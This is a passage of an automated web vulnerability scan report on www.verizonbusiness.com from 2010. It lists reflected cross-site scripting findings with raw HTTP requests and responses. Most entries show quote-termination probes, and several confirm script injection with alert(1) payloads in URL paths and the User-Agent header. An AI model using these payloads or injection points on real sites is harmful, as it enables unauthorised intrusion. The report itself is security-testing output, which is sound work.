hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/worldwidef8d7e";de47903cbee/resources/media/large-131421-mitsui.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION M
...[SNIP]...

1.1152. http://www.verizonbusiness.com/worldwide/resources/media/large-131421-mitsui.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/large-131421-mitsui.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3b1ba'%3b3713fda6903 was submitted in the REST URL parameter 2. This input was echoed as 3b1ba';3713fda6903 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide/resources3b1ba'%3b3713fda6903/media/large-131421-mitsui.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:01:12 GMT
Content-Type: text/html
Content-Length: 40678
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:01:12 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:01:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/worldwide/resources3b1ba';3713fda6903/media/large-131421-mitsui.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1153. http://www.verizonbusiness.com/worldwide/resources/media/large-131421-mitsui.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/large-131421-mitsui.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 723f8"%3b016e42dcbe8 was submitted in the REST URL parameter 2. This input was echoed as 723f8";016e42dcbe8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide/resources723f8"%3b016e42dcbe8/media/large-131421-mitsui.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:00:54 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40680
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:00:54 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:00:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
atch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/worldwide/resources723f8";016e42dcbe8/media/large-131421-mitsui.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELE
...[SNIP]...

1.1154. http://www.verizonbusiness.com/worldwide/resources/media/large-131421-mitsui.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/large-131421-mitsui.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ee6a"%3b4f7bbbfbc2f was submitted in the REST URL parameter 3. This input was echoed as 9ee6a";4f7bbbfbc2f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide/resources/media9ee6a"%3b4f7bbbfbc2f/large-131421-mitsui.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:01:22 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40288
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:01:22 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:01:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/worldwide/resources/media9ee6a";4f7bbbfbc2f/large-131421-mitsui.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.1155. http://www.verizonbusiness.com/worldwide/resources/media/large-131421-mitsui.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/large-131421-mitsui.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b659'%3b24c0a7e6852 was submitted in the REST URL parameter 3. This input was echoed as 1b659';24c0a7e6852 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide/resources/media1b659'%3b24c0a7e6852/large-131421-mitsui.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:01:32 GMT
Content-Type: text/html
Content-Length: 40290
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:01:32 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:01:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/worldwide/resources/media1b659';24c0a7e6852/large-131421-mitsui.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1156. http://www.verizonbusiness.com/worldwide/resources/media/large-131421-mitsui.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/large-131421-mitsui.xml

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1bdd8</script><script>alert(1)</script>c483f84a204 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide/resources/media/large-131421-mitsui.xml1bdd8</script><script>alert(1)</script>c483f84a204 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "3de5a50ebb7bd8689e48ef1c4fb9e769"
Last-Modified: Wed, 17 Nov 2010 01:01:54 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 01:01:54 GMT
Content-Length: 17296
Connection: close
Set-Cookie: BERT=VRID%3df6699c20-efb6-4dec-adb9-8a09175bd672|VTID%3d9508545a-43b4-454c-b863-50f5d9690146|SX%3d1289956913|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 06:05:37 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 19:01:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<url>/worldwide/resources/media/large-131421-mitsui.xml1bdd8</script><script>alert(1)</script>c483f84a204</url>
...[SNIP]...

1.1157. http://www.verizonbusiness.com/worldwide/resources/media/large-131513-mitsui.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/large-131513-mitsui.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75f0b'%3bddf7503804e was submitted in the REST URL parameter 1. This input was echoed as 75f0b';ddf7503804e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide75f0b'%3bddf7503804e/resources/media/large-131513-mitsui.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:01:16 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40678
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:01:16 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:01:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/worldwide75f0b';ddf7503804e/resources/media/large-131513-mitsui.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1158. http://www.verizonbusiness.com/worldwide/resources/media/large-131513-mitsui.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/large-131513-mitsui.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63cb4"%3bebba4ad3ff9 was submitted in the REST URL parameter 1. This input was echoed as 63cb4";ebba4ad3ff9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide63cb4"%3bebba4ad3ff9/resources/media/large-131513-mitsui.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:00:58 GMT
Content-Type: text/html
Content-Length: 40680
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:00:58 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:00:58 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/worldwide63cb4";ebba4ad3ff9/resources/media/large-131513-mitsui.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION M
...[SNIP]...

1.1159. http://www.verizonbusiness.com/worldwide/resources/media/large-131513-mitsui.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/large-131513-mitsui.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5ad6"%3b471b21e6a30 was submitted in the REST URL parameter 2. This input was echoed as d5ad6";471b21e6a30 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide/resourcesd5ad6"%3b471b21e6a30/media/large-131513-mitsui.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:01:28 GMT
Content-Type: text/html
Content-Length: 40678
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:01:28 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:01:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
atch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/worldwide/resourcesd5ad6";471b21e6a30/media/large-131513-mitsui.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELE
...[SNIP]...

1.1160. http://www.verizonbusiness.com/worldwide/resources/media/large-131513-mitsui.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/large-131513-mitsui.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6565'%3badba750a278 was submitted in the REST URL parameter 2. This input was echoed as f6565';adba750a278 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide/resourcesf6565'%3badba750a278/media/large-131513-mitsui.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:01:38 GMT
Content-Type: text/html
Content-Length: 40678
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:01:38 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:01:38 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/worldwide/resourcesf6565';adba750a278/media/large-131513-mitsui.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1161. http://www.verizonbusiness.com/worldwide/resources/media/large-131513-mitsui.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/large-131513-mitsui.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50074"%3b1df4138d71 was submitted in the REST URL parameter 3. This input was echoed as 50074";1df4138d71 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide/resources/media50074"%3b1df4138d71/large-131513-mitsui.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:01:50 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40286
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:01:50 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:01:50 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/worldwide/resources/media50074";1df4138d71/large-131513-mitsui.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.1162. http://www.verizonbusiness.com/worldwide/resources/media/large-131513-mitsui.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/large-131513-mitsui.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c6204'%3bb4459472f80 was submitted in the REST URL parameter 3. This input was echoed as c6204';b4459472f80 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide/resources/mediac6204'%3bb4459472f80/large-131513-mitsui.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:01:59 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40288
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:02:00 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:01:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/worldwide/resources/mediac6204';b4459472f80/large-131513-mitsui.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1163. http://www.verizonbusiness.com/worldwide/resources/media/large-131513-mitsui.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /worldwide/resources/media/large-131513-mitsui.xml

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82ffb</script><script>alert(1)</script>b1de1379f80 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldwide/resources/media/large-131513-mitsui.xml82ffb</script><script>alert(1)</script>b1de1379f80 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "d9da2b056f6436c71cd013f2136ec6d7"
Last-Modified: Wed, 17 Nov 2010 01:02:23 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 01:02:23 GMT
Content-Length: 17257
Connection: close
Set-Cookie: BERT=VRID%3d4191c186-ae11-4bf8-8346-8a381dedb7e9|VTID%3dabb77705-cd09-4409-a863-69e787434097|SX%3d1289956943|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 06:06:07 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 19:02:23 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...
<url>/worldwide/resources/media/large-131513-mitsui.xml82ffb</script><script>alert(1)</script>b1de1379f80</url>
...[SNIP]...

1.1164. http://www.verizonbusiness.com/Medium/ [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /Medium/

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2370</script><script>alert(1)</script>1fabb20e843 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Medium/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
